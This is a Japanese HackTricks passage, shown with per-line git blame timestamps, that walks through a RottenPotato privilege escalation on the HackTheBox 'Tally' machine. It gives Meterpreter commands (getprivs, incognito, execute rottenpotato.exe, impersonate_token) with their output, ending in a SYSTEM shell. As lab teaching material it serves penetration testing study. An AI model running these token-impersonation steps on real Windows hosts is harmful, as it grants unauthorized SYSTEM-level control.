2022-05-08 23:13:03 +00:00
|
|
|
|
# RottenPotato
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
このページの情報は、[この投稿](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/)から抽出されました。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
サービスアカウントには通常、特権(SeImpersonatePrivileges)があり、これを使用して特権をエスカレーションすることができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
[https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
この脆弱性がどのように機能するかの詳細については説明しませんが、上記の記事は私が説明するよりもはるかに詳しいです。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
メータープリンターで特権を確認しましょう:
|
2022-05-08 23:13:03 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
meterpreter > getprivs
|
|
|
|
|
|
|
|
|
|
Enabled Process Privileges
|
|
|
|
|
==========================
|
|
|
|
|
|
|
|
|
|
Name
|
|
|
|
|
----
|
|
|
|
|
SeAssignPrimaryTokenPrivilege
|
|
|
|
|
SeChangeNotifyPrivilege
|
|
|
|
|
SeCreateGlobalPrivilege
|
|
|
|
|
SeImpersonatePrivilege
|
|
|
|
|
SeIncreaseQuotaPrivilege
|
|
|
|
|
SeIncreaseWorkingSetPrivilege
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
素晴らしい、攻撃を実行するために必要な特権を持っているようです。`rottenpotato.exe`をアップロードしましょう。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
メータープリターセッションに戻り、`incognito`拡張機能をロードします。
|
2022-05-08 23:13:03 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
meterpreter > use incognito
|
|
|
|
|
Loading extension incognito...Success.
|
|
|
|
|
meterpreter > list_tokens -u
|
|
|
|
|
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
|
2023-07-07 23:42:27 +00:00
|
|
|
|
Call rev2self if primary process token is SYSTEM
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
Delegation Tokens Available
|
|
|
|
|
========================================
|
|
|
|
|
NT SERVICE\SQLSERVERAGENT
|
|
|
|
|
NT SERVICE\SQLTELEMETRY
|
|
|
|
|
TALLY\Sarah
|
|
|
|
|
|
|
|
|
|
Impersonation Tokens Available
|
|
|
|
|
========================================
|
|
|
|
|
No tokens available
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
現在、私たちはインパーソネーション トークンを持っていないことがわかります。Rotten Potato exploitを実行しましょう。
|
2022-05-08 23:13:03 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
meterpreter > execute -f rottenpotato.exe -Hc
|
|
|
|
|
Process 3104 created.
|
|
|
|
|
Channel 2 created.
|
|
|
|
|
meterpreter > list_tokens -u
|
|
|
|
|
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
|
2023-07-07 23:42:27 +00:00
|
|
|
|
Call rev2self if primary process token is SYSTEM
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
Delegation Tokens Available
|
|
|
|
|
========================================
|
|
|
|
|
NT SERVICE\SQLSERVERAGENT
|
|
|
|
|
NT SERVICE\SQLTELEMETRY
|
|
|
|
|
TALLY\Sarah
|
|
|
|
|
|
|
|
|
|
Impersonation Tokens Available
|
|
|
|
|
========================================
|
|
|
|
|
NT AUTHORITY\SYSTEM
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
私たちはトークンを素早く偽装する必要があります。そうしないと、トークンは消えてしまいます。
|
2022-05-08 23:13:03 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
|
|
|
|
|
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
|
2023-07-07 23:42:27 +00:00
|
|
|
|
Call rev2self if primary process token is SYSTEM
|
2020-07-15 15:43:14 +00:00
|
|
|
|
[-] No delegation token available
|
|
|
|
|
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: NT AUTHORITY\SYSTEM
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
成功しました!SYSTEMシェルを取得し、root.txtファイルを取得できました!
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-04-28 16:01:33 +00:00
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ会社で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|